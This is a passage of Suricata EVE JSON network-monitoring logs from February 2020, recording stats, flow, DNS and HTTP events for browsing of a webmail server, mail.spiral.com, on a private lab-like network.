{"timestamp":"2020-02-29T00:13:40.000141+0000","event_type":"stats","stats":{"uptime":14472,"capture":{"kernel_packets":135522,"kernel_drops":0},"decoder":{"pkts":135525,"bytes":93357047,"invalid":187,"ipv4":134026,"ipv6":8,"ethernet":135525,"raw":0,"null":0,"sll":0,"tcp":128712,"udp":5112,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2773,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2789,"synack":2780,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1812,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2335,"failed_udp":112},"tx":{"http":4667,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2415}},"flow_mgr":{"closed_pruned":2747,"new_pruned":15,"est_pruned":2378,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22808,"memcap_state":0,"memcap_global":0},"http":{"memuse":69891,"memcap":0}}} {"timestamp":"2020-02-29T00:13:41.000382+0000","flow_id":454818455014582,"event_type":"flow","src_ip":"192.168.10.130","src_port":34812,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1079,"bytes_toclient":5726,"start":"2020-02-29T00:12:34.904374+0000","end":"2020-02-29T00:12:40.104449+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:44.000537+0000","flow_id":931899127526949,"event_type":"flow","src_ip":"192.168.10.81","src_port":52732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":10,"bytes_toserver":969,"bytes_toclient":8961,"start":"2020-02-29T00:12:38.423461+0000","end":"2020-02-29T00:12:43.700773+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:46.283999+0000","flow_id":302931236246879,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36289,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":53267,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:46.392737+0000","flow_id":302931236246879,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36289,"proto":"UDP","dns":{"type":"answer","id":53267,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:46.392737+0000","flow_id":302931236246879,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36289,"proto":"UDP","dns":{"type":"answer","id":53267,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:46.542266+0000","flow_id":36578839428506,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34822,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7092}} {"timestamp":"2020-02-29T00:13:47.000164+0000","event_type":"stats","stats":{"uptime":14479,"capture":{"kernel_packets":135522,"kernel_drops":0},"decoder":{"pkts":135525,"bytes":93357047,"invalid":187,"ipv4":134026,"ipv6":8,"ethernet":135525,"raw":0,"null":0,"sll":0,"tcp":128712,"udp":5112,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2773,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2789,"synack":2780,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1812,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2335,"failed_udp":112},"tx":{"http":4667,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2415}},"flow_mgr":{"closed_pruned":2749,"new_pruned":15,"est_pruned":2379,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23139,"memcap_state":0,"memcap_global":0},"http":{"memuse":86717,"memcap":0}}} {"timestamp":"2020-02-29T00:13:50.000191+0000","flow_id":569176254904198,"event_type":"flow","src_ip":"192.168.10.81","src_port":52740,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:12:44.456582+0000","end":"2020-02-29T00:12:49.495013+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:50.001136+0000","flow_id":618010033054210,"event_type":"flow","src_ip":"192.168.10.81","src_port":52738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":23,"bytes_toserver":2113,"bytes_toclient":27714,"start":"2020-02-29T00:12:44.451074+0000","end":"2020-02-29T00:12:49.823477+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:50.001870+0000","flow_id":1828739838965696,"event_type":"flow","src_ip":"192.168.10.81","src_port":52742,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":3,"bytes_toserver":272,"bytes_toclient":206,"start":"2020-02-29T00:12:44.456640+0000","end":"2020-02-29T00:12:49.495139+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:51.000268+0000","flow_id":1572119837955811,"event_type":"flow","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":31,"pkts_toclient":45,"bytes_toserver":5382,"bytes_toclient":54890,"start":"2020-02-29T00:12:44.349923+0000","end":"2020-02-29T00:12:50.097921+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:51.000970+0000","flow_id":1404448609633777,"event_type":"flow","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":65,"pkts_toclient":106,"bytes_toserver":11740,"bytes_toclient":134404,"start":"2020-02-29T00:12:43.886257+0000","end":"2020-02-29T00:12:50.111525+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:51.544391+0000","flow_id":36578839428506,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34822,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7092},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38924,"tx_id":0}} {"timestamp":"2020-02-29T00:13:51.634397+0000","flow_id":720204489272861,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37890,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38735,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:51.742601+0000","flow_id":720204489272861,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37890,"proto":"UDP","dns":{"type":"answer","id":38735,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:51.742601+0000","flow_id":720204489272861,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37890,"proto":"UDP","dns":{"type":"answer","id":38735,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:51.831022+0000","flow_id":1297456683777400,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34824,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8117}} {"timestamp":"2020-02-29T00:13:53.127322+0000","flow_id":902968232767834,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38101,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60152,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:53.235775+0000","flow_id":902968232767834,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38101,"proto":"UDP","dns":{"type":"answer","id":60152,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:53.235775+0000","flow_id":902968232767834,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38101,"proto":"UDP","dns":{"type":"answer","id":60152,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:53.376536+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7921}} {"timestamp":"2020-02-29T00:13:54.000207+0000","event_type":"stats","stats":{"uptime":14486,"capture":{"kernel_packets":135553,"kernel_drops":0},"decoder":{"pkts":135569,"bytes":93377242,"invalid":187,"ipv4":134070,"ipv6":8,"ethernet":135569,"raw":0,"null":0,"sll":0,"tcp":128752,"udp":5116,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2775,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2791,"synack":2782,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1814,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2337,"failed_udp":112},"tx":{"http":4669,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2417}},"flow_mgr":{"closed_pruned":2754,"new_pruned":15,"est_pruned":2379,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23800,"memcap_state":0,"memcap_global":0},"http":{"memuse":138450,"memcap":0}}} {"timestamp":"2020-02-29T00:13:56.000396+0000","flow_id":886797661356645,"event_type":"flow","src_ip":"192.168.10.122","src_port":51170,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:55.311909+0000","end":"2020-02-29T00:08:55.421067+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:56.836058+0000","flow_id":1297456683777400,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34824,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8117},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":33564,"tx_id":0}} {"timestamp":"2020-02-29T00:13:57.000208+0000","flow_id":432368661990283,"event_type":"flow","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":12,"bytes_toserver":1832,"bytes_toclient":8349,"start":"2020-02-29T00:12:50.953227+0000","end":"2020-02-29T00:12:56.254674+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:57.001387+0000","flow_id":1905800142540588,"event_type":"flow","src_ip":"192.168.10.81","src_port":52744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1082,"bytes_toclient":1019,"start":"2020-02-29T00:12:50.937772+0000","end":"2020-02-29T00:12:56.091654+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:57.589667+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7921},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44801,"tx_id":0}} {"timestamp":"2020-02-29T00:13:57.600559+0000","flow_id":1485649266158063,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43502,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61162,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:57.709068+0000","flow_id":1485649266158063,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43502,"proto":"UDP","dns":{"type":"answer","id":61162,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:57.709068+0000","flow_id":1485649266158063,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43502,"proto":"UDP","dns":{"type":"answer","id":61162,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:57.765520+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5464}} {"timestamp":"2020-02-29T00:14:00.000707+0000","flow_id":795898973717572,"event_type":"flow","src_ip":"192.168.10.122","src_port":44755,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:59.853060+0000","end":"2020-02-29T00:08:59.961986+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:01.000432+0000","event_type":"stats","stats":{"uptime":14493,"capture":{"kernel_packets":135593,"kernel_drops":0},"decoder":{"pkts":135603,"bytes":93394794,"invalid":187,"ipv4":134104,"ipv6":8,"ethernet":135603,"raw":0,"null":0,"sll":0,"tcp":128782,"udp":5120,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2776,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2792,"synack":2783,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1815,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2339,"failed_udp":112},"tx":{"http":4671,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2419}},"flow_mgr":{"closed_pruned":2756,"new_pruned":15,"est_pruned":2380,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23470,"memcap_state":0,"memcap_global":0},"http":{"memuse":87581,"memcap":0}}} {"timestamp":"2020-02-29T00:14:01.005964+0000","flow_id":1395802825860624,"event_type":"flow","src_ip":"192.168.10.122","src_port":56407,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:00.304656+0000","end":"2020-02-29T00:09:00.413211+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:02.766663+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5464},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":28285,"tx_id":1}} {"timestamp":"2020-02-29T00:14:05.000841+0000","flow_id":98370530812316,"event_type":"flow","src_ip":"192.168.10.81","src_port":52748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1290,"bytes_toclient":810,"start":"2020-02-29T00:12:59.565660+0000","end":"2020-02-29T00:13:04.757093+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:05.878088+0000","flow_id":390853513012744,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37310,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32867,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:05.986371+0000","flow_id":390853513012744,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37310,"proto":"UDP","dns":{"type":"answer","id":32867,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:05.986371+0000","flow_id":390853513012744,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37310,"proto":"UDP","dns":{"type":"answer","id":32867,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:06.315620+0000","flow_id":756720302109332,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34826,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6756}} {"timestamp":"2020-02-29T00:14:07.002983+0000","flow_id":1205458465593479,"event_type":"flow","src_ip":"192.168.10.122","src_port":58650,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:06.858247+0000","end":"2020-02-29T00:09:06.968272+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:07.003817+0000","flow_id":1235763754834258,"event_type":"flow","src_ip":"192.168.10.122","src_port":50319,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:06.465234+0000","end":"2020-02-29T00:09:06.573102+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:07.003916+0000","flow_id":816196989671691,"event_type":"flow","src_ip":"192.168.10.122","src_port":40498,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:06.448779+0000","end":"2020-02-29T00:09:06.557375+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:08.000400+0000","event_type":"stats","stats":{"uptime":14500,"capture":{"kernel_packets":135612,"kernel_drops":0},"decoder":{"pkts":135615,"bytes":93396136,"invalid":187,"ipv4":134114,"ipv6":8,"ethernet":135615,"raw":0,"null":0,"sll":0,"tcp":128790,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1815,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2757,"new_pruned":15,"est_pruned":2382,"bypassed_pruned":0,"flows_checked":0,"flows_notim